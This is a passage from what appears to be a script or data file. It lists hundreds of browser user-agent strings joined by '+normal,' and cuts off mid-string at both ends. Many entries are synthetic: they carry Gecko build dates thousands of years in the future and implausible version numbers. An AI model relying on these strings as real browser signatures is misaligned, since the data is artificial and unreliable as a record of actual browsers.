Gecko) Chrome/47.0.866.0 Safari/535.2' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows 98; Win 9x 4.90; Trident/3.1)' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/58.0.860.0 Safari/531.0' +normal,'Opera/9.45.(Windows CE; or-IN) Presto/2.9.169 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.0; Trident/3.1)' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.0)' +normal,'Opera/9.42.(Windows 95; tn-ZA) Presto/2.9.168 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/4.1)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; lv-LV) AppleWebKit/531.32.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.32.1' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.1; Trident/4.0)' +normal,'Opera/9.98.(Windows NT 10.0; kok-IN) Presto/2.9.168 Version/11.00' +normal,'Opera/9.34.(Windows 98; ug-CN) Presto/2.9.167 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/50.0.841.0 Safari/531.0' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/63.0.836.0 Safari/532.1' +normal,'Mozilla/5.0 (Android 6.0.1; Mobile; rv:20.0) Gecko/20.0 Firefox/20.0' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.2; Trident/3.0)' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.1)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; ru-RU) AppleWebKit/532.47.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6532.47.5' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) CriOS/60.0.887.0 Mobile/28M822 Safari/536.0' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_6; rv:1.9.6.20) Gecko/4606-09-25 00:59:21.936157 Firefox/3.6.1' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.01; Trident/3.1)' +normal,'Mozilla/5.0 (Android 3.2.2; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0' +normal,'Opera/9.15.(Windows 98; brx-IN) Presto/2.9.178 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/3.0)' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/47.0.872.0 Safari/532.0' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_2; rv:1.9.6.20) Gecko/3674-05-10 21:29:13.869736 Firefox/3.6.3' +normal,'Opera/8.98.(Windows NT 4.0; so-ET) Presto/2.9.189 Version/10.00' +normal,'Opera/8.47.(X11; Linux i686; id-ID) Presto/2.9.189 Version/10.00' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/52.0.882.0 Safari/533.2' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; iw-IL) AppleWebKit/533.45.5 (KHTML, like Gecko) Version/3.0.5 Mobile/8B114 Safari/6533.45.5' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/4.1)' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_6_7 rv:6.0; yo-NG) AppleWebKit/535.14.2 (KHTML, like Gecko) Version/5.0.1 Safari/535.14.2' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows CE; Trident/5.0)' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.01; Trident/5.1)' +normal,'Mozilla/5.0 (Windows NT 5.1; hy-AM; rv:1.9.2.20) Gecko/2132-02-01 16:05:29.625677 Firefox/3.8' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9 rv:6.0; mk-MK) AppleWebKit/532.23.2 (KHTML, like Gecko) Version/4.0.3 Safari/532.23.2' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/3.0)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/56.0.831.0 Mobile/87U867 Safari/531.1' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/3.0)' +normal,'Opera/9.26.(Windows NT 10.0; km-KH) Presto/2.9.184 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sat-IN) AppleWebKit/535.35.3 (KHTML, like Gecko) Version/5.0 Safari/535.35.3' +normal,'Opera/8.93.(X11; Linux x86_64; fy-DE) Presto/2.9.176 Version/11.00' +normal,'Opera/8.11.(Windows CE; szl-PL) Presto/2.9.173 Version/10.00' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/37.0.823.0 Safari/531.1' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 10_3_3 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/39.0.810.0 Mobile/53P339 Safari/532.1' +normal,'Opera/9.52.(X11; Linux x86_64; wal-ET) Presto/2.9.185 Version/10.00' +normal,'Opera/9.77.(X11; Linux i686; hsb-DE) Presto/2.9.185 Version/11.00' +normal,'Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.10.2 (KHTML, like Gecko) Version/5.0.3 Safari/531.10.2' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_1 rv:5.0; sw-TZ) AppleWebKit/533.31.5 (KHTML, like Gecko) Version/5.1 Safari/533.31.5' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/15.6h8555.0 Mobile/62L194 Safari/533.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows 95; Trident/4.1)' +normal,'Mozilla/5.0 (Windows NT 6.0; fr-LU; rv:1.9.0.20) Gecko/7089-04-04 09:16:27.313293 Firefox/3.8' +normal,'Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/9395-01-17 23:40:43.634399 Firefox/7.0' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.1)' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/13.0.851.0 Safari/531.0' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/4.0)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7 rv:6.0; de-AT) AppleWebKit/533.6.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.6.1' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_4 rv:3.0; kn-IN) AppleWebKit/531.29.2 (KHTML, like Gecko) Version/4.0.3 Safari/531.29.2' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/3.0)' +normal,'Mozilla/5.0 (Android 7.0; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/3.1)' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_6) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/54.0.807.0 Safari/535.0' +normal,'Opera/9.53.(X11; Linux x86_64; wo-SN) Presto/2.9.162 Version/11.00' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/44.0.884.0 Safari/534.2' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)' +normal,'Mozilla/5.0 (Windows NT 10.0; nl-AW; rv:1.9.2.20) Gecko/4351-12-09 06:13:35.937759 Firefox/3.8' +normal,'Mozilla/5.0 (Windows NT 6.2; ml-IN; rv:1.9.0.20) Gecko/7087-07-20 02:56:05.086975 Firefox/3.6.1' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/534.2 (KHTML, like Gecko) CriOS/13.0.834.0 Mobile/01D273 Safari/534.2' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 9_3_6 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) FxiOS/10.5f1744.0 Mobile/77E447 Safari/532.0' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/533.3.5 (KHTML, like Gecko) Version/4.0.3 Safari/533.3.5' +normal,'Mozilla/5.0 (Android 2.3.2; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0' +normal,'Opera/8.93.(X11; Linux x86_64; doi-IN) Presto/2.9.190 Version/12.00' +normal,'Opera/9.89.(X11; Linux i686; ss-ZA) Presto/2.9.166 Version/12.00' +normal,'Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/532.35.3 (KHTML, like Gecko) Version/5.1 Safari/532.35.3' +normal,'Opera/9.55.(X11; Linux i686; os-RU) Presto/2.9.169 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.1)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_7; rv:1.9.3.20) Gecko/6508-11-13 15:04:25.747223 Firefox/10.0' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.1)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/531.0 (KHTML, like Gecko) FxiOS/15.5d8190.0 Mobile/10I820 Safari/531.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/54.0.834.0 Safari/531.1' +normal,'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/15.0.812.0 Safari/532.1' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/534.0 (KHTML, like Gecko) FxiOS/15.2i7978.0 Mobile/78U660 Safari/534.0' +normal,'Opera/9.43.(X11; Linux i686; kl-GL) Presto/2.9.169 Version/11.00' +normal,'Opera/9.71.(Windows NT 6.2; zu-ZA) Presto/2.9.186 Version/12.00' +normal,'Opera/9.62.(X11; Linux x86_64; mag-IN) Presto/2.9.168 Version/10.00' +normal,'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/60.0.871.0 Safari/531.0' +normal,'Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/531.23.3 (KHTML, like Gecko) Version/4.1 Safari/531.23.3' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_4 rv:4.0; id-ID) AppleWebKit/533.7.3 (KHTML, like Gecko) Version/5.0.1 Safari/533.7.3' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 4_2_1 like Mac OS X) AppleWebKit/533.1 (KHTML, like Gecko) CriOS/37.0.822.0 Mobile/24C979 Safari/533.1' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_4; rv:1.9.6.20) Gecko/2412-11-16 12:17:37.911606 Firefox/12.0' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_6) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/18.0.808.0 Safari/533.2' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.1)' +normal,'Opera/9.18.(X11; Linux i686; lv-LV) Presto/2.9.160 Version/10.00' +normal,'Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/533.17.3 (KHTML, like Gecko) Version/4.0 Safari/533.17.3' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/40.0.886.0 Safari/531.1' +normal,'Mozilla/5.0 (Android 4.1.1; Mobile; rv:42.0) Gecko/42.0 Firefox/42.0' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; lv-LV) AppleWebKit/535.30.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6535.30.1' +normal,'Opera/9.84.(X11; Linux x86_64; de-CH) Presto/2.9.173 Version/12.00' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/3.0)' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)' +normal,'Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/5963-10-12 18:11:01.747589 Firefox/4.0' +normal,'Mozilla/5.0 (Android 4.4.2; Mobile; rv:29.0) Gecko/29.0 Firefox/29.0' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_5) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/25.0.804.0 Safari/535.0' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/51.0.872.0 Safari/533.0' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/13.0.881.0 Safari/533.2' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; kl-GL) AppleWebKit/534.19.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6534.19.5' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 9_3_6 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/18.1b6315.0 Mobile/98Z923 Safari/535.2' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; dz-BT) AppleWebKit/533.6.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6533.6.7' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_6; rv:1.9.2.20) Gecko/5050-11-19 22:57:39.755997 Firefox/3.8' +normal,'Opera/8.12.(Windows CE; kw-GB) Presto/2.9.186 Version/11.00' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; cv-RU) AppleWebKit/535.4.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B112 Safari/6535.4.7' +normal,'Opera/8.72.(Windows 98; gd-GB) Presto/2.9.187 Version/10.00' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.38.2 (KHTML, like Gecko) Version/4.0.3 Safari/532.38.2' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/38.0.810.0 Safari/535.0' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_9_3; rv:1.9.3.20) Gecko/9782-01-12 03:07:08.113403 Firefox/3.6.12' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) CriOS/16.0.896.0 Mobile/66K414 Safari/532.0' +normal,'Opera/9.60.(Windows NT 4.0; tk-TM) Presto/2.9.181 Version/10.00' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/532.16.4 (KHTML, like Gecko) Version/5.0 Safari/532.16.4' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 10.0; Trident/4.0)' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/13.9v6101.0 Mobile/85X309 Safari/535.2' +normal,'Mozilla/5.0 (Linux; Android 2.3.6) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/29.0.892.0 Safari/533.2' +normal,'Opera/9.69.(X11; Linux i686; be-BY) Presto/2.9.176 Version/12.00' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/9567-08-24 10:22:16.076965 Firefox/3.6.15' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows 95; Trident/5.0)' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_0 rv:6.0; st-ZA) AppleWebKit/535.27.6 (KHTML, like Gecko) Version/4.0.5 Safari/535.27.6' +normal,'Mozilla/5.0 (Windows NT 5.01; nhn-MX; rv:1.9.0.20) Gecko/2379-07-24 10:22:25.950911 Firefox/15.0' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0; rv:1.9.5.20) Gecko/9546-11-25 18:31:22.172852 Firefox/7.0' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_2; rv:1.9.2.20) Gecko/3076-12-03 12:01:04.416962 Firefox/3.6.10' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) FxiOS/12.7q9299.0 Mobile/81W496 Safari/536.0' +normal,'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/45.0.884.0 Mobile/85I703 Safari/531.1' +normal,'Mozilla/5.0 (Windows; U; Windows 98) AppleWebKit/535.2.1 (KHTML, like Gecko) Version/5.0.5 Safari/535.2.1' +normal,'Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/533.3.7 (KHTML, like Gecko) Version/4.0.3 Safari/533.3.7' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 3_1_3 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) FxiOS/14.3m7865.0 Mobile/04J014 Safari/536.0' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 6_1_6 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/14.8w4697.0 Mobile/83K145 Safari/533.0' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/4.1)' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/3.0)' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/14.0.869.0 Safari/533.1' +normal,'Opera/8.72.(Windows 98; sd-PK) Presto/2.9.190 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/18.0.885.0 Safari/533.0' +normal,'Opera/8.15.(X11; Linux i686; so-DJ) Presto/2.9.161 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/3.1)' +normal,'Opera/9.51.(Windows NT 5.2; gd-GB) Presto/2.9.176 Version/12.00' +normal,'Opera/9.31.(Windows 98; Win 9x 4.90; hy-AM) Presto/2.9.190 Version/10.00' +normal,'Opera/9.86.(Windows 98; Win 9x 4.90; os-RU) Presto/2.9.170 Version/11.00' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_1; rv:1.9.5.20) Gecko/8648-02-29 06:08:19.367676 Firefox/3.6.8' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8_6 rv:4.0; wo-SN) AppleWebKit/535.30.3 (KHTML, like Gecko) Version/4.0 Safari/535.30.3' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/535.2 (KHTML, like Gecko) FxiOS/11.2g9827.0 Mobile/00Z542 Safari/535.2' +normal,'Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/534.7.1 (KHTML, like Gecko) Version/5.0.1 Safari/534.7.1' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows 95; Trident/3.1)' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; rv:1.9.4.20) Gecko/7236-12-16 12:18:13.590759 Firefox/3.8' +normal,'Mozilla/5.0 (Linux; Android 2.3.6) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/46.0.845.0 Safari/531.2' +normal,'Opera/9.85.(X11; Linux x86_64; shs-CA) Presto/2.9.178 Version/11.00' +normal,'Mozilla/5.0 (Android 8.0.0; Mobile; rv:26.0) Gecko/26.0 Firefox/26.0' +normal,'Opera/8.23.(X11; Linux i686; aa-DJ) Presto/2.9.182 Version/12.00' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/531.12.1 (KHTML, like Gecko) Version/5.0.1 Safari/531.12.1' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/3547-06-27 11:28:37.447731 Firefox/3.8' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_6; rv:1.9.3.20) Gecko/6079-03-12 09:40:27.410263 Firefox/3.8' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/46.0.852.0 Safari/533.1' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/44.0.838.0 Safari/536.2' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/28.0.817.0 Safari/531.0' +normal,'Mozilla/5.0 (Android 3.2.5; Mobile; rv:60.0) Gecko/60.0 Firefox/60.0' +normal,'Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.5.6 (KHTML, like Gecko) Version/4.0.5 Safari/535.5.6' +normal,'Opera/9.58.(X11; Linux i686; iu-CA) Presto/2.9.168 Version/12.00' +normal,'Opera/8.54.(Windows CE; wo-SN) Presto/2.9.179 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_2 rv:6.0; sq-AL) AppleWebKit/535.22.4 (KHTML, like Gecko) Version/4.0.5 Safari/535.22.4' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 4_2_1 like Mac OS X) AppleWebKit/536.2 (KHTML, like Gecko) FxiOS/16.8c9097.0 Mobile/75D224 Safari/536.2' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/5.1)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; bo-CN) AppleWebKit/532.45.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6532.45.6' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/35.0.826.0 Safari/534.0' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 95; Trident/5.0)' +normal,'Opera/8.67.(Windows NT 6.2; id-ID) Presto/2.9.160 Version/11.00' +normal,'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/36.0.880.0 Safari/535.0' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_6 rv:4.0; cv-RU) AppleWebKit/534.9.6 (KHTML, like Gecko) Version/5.0 Safari/534.9.6' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Trident/4.0)' +normal,'Opera/9.81.(X11; Linux i686; cmn-TW) Presto/2.9.178 Version/10.00' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5 rv:6.0; gl-ES) AppleWebKit/534.23.2 (KHTML, like Gecko) Version/4.1 Safari/534.23.2' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; it-IT) AppleWebKit/535.44.3 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.44.3' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_0 rv:2.0; hy-AM) AppleWebKit/535.31.4 (KHTML, like Gecko) Version/5.0.4 Safari/535.31.4' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_12_4 rv:4.0; hr-HR) AppleWebKit/534.43.2 (KHTML, like Gecko) Version/4.0.4 Safari/534.43.2' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_5 rv:6.0; mg-MG) AppleWebKit/532.10.1 (KHTML, like Gecko) Version/4.0.1 Safari/532.10.1' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/532.0 (KHTML, like Gecko) FxiOS/15.4m7517.0 Mobile/83X938 Safari/532.0' +normal,'Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.5.1 (KHTML, like Gecko) Version/5.0.4 Safari/532.5.1' +normal,'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 10.0; Trident/3.0)' +normal,'Mozilla/5.0 (iPad; CPU iPad OS 7_1_2 like Mac OS X) AppleWebKit/531.2 (KHTML, like Gecko) CriOS/54.0.845.0 Mobile/77L461 Safari/531.2' +normal,'Opera/9.96.(Windows 98; Win 9x 4.90; mn-MN) Presto/2.9.180 Version/12.00' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/7205-04-30 19:09:51.166718 Firefox/10.0' +normal,'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/28.0.817.0 Safari/535.2' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_7) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/55.0.835.0 Safari/536.2' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/24.0.880.0 Safari/531.1' +normal,'Mozilla/5.0 (Linux; Android 2.3.5) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/20.0.894.0 Safari/535.0' +normal,'Opera/8.23.(Windows NT 10.0; fo-FO) Presto/2.9.188 Version/12.00' +normal,'Opera/8.16.(Windows 95; be-BY) Presto/2.9.169 Version/12.00' +normal,'Opera/8.29.(Windows NT 6.2; om-ET) Presto/2.9.173 Version/10.00' +normal,'Mozilla/5.0 (Windows NT 5.0; pt-PT; rv:1.9.2.20) Gecko/9951-12-30 00:44:24.630219 Firefox/5.0' +normal,'Mozilla/5.0 (Android 4.0.1; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0' +normal,'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/20.0.888.0 Safari/534.2' +normal,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/59.0.891.0 Safari/533.2' +normal,'Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/534.9.4 (KHTML, like Gecko) Version/4.0.4 Safari/534.9.4' +normal,'Opera/9.38.(X11; Linux i686; tl-PH) Presto/2.9.185 Version/11.00' +normal,'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/3.1)' +normal,'Mozilla/5.0 (Windows; U; Windows NT 10.0) AppleWebKit/533.10.5 (KHTML, like Gecko) Version/5.0 Safari/533.10.5' +normal,'Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.0)' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/22.0.868.0 Safari/535.2' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/54.0.895.0 Safari/535.2' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/8408-02-19 08:49:41.447388 Firefox/3.8' +normal,'Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/5185-06-02 12:32:44.162292 Firefox/3.8' +normal,'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/534.43.2 (KHTML, like Gecko) Version/4.1 Safari/534.43.2' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/29.0.802.0 Safari/532.1' +normal,'Mozilla/5.0 (compatible; MSIE 9.0; Windows 98; Win 9x 4.90; Trident/3.0)' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; ks-IN) AppleWebKit/535.6.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6535.6.1' +normal,'Opera/8.76.(X11; Linux i686; hsb-DE) Presto/2.9.174 Version/12.00' +normal,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_7) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/62.0.843.0 Safari/536.2' +normal,'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.1 (KHTML, like Gecko) Chrome/33.0.881.0 Safari/536.1' +normal,'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' +normal,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_2; rv:1.9.3.20) Gecko/5678-06-30 17:45:36.739685 Firefox/3.8' +normal,'Mozilla/5.0 (Macintosh; PPC Mac OS X 10_11_3; rv:1.9.2.20) Gecko/7392-09-29 01:56:11.388031 Firefox/3.8' +normal,'Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; sq-AL) AppleWebKit/533.24.4 (KHTML, like 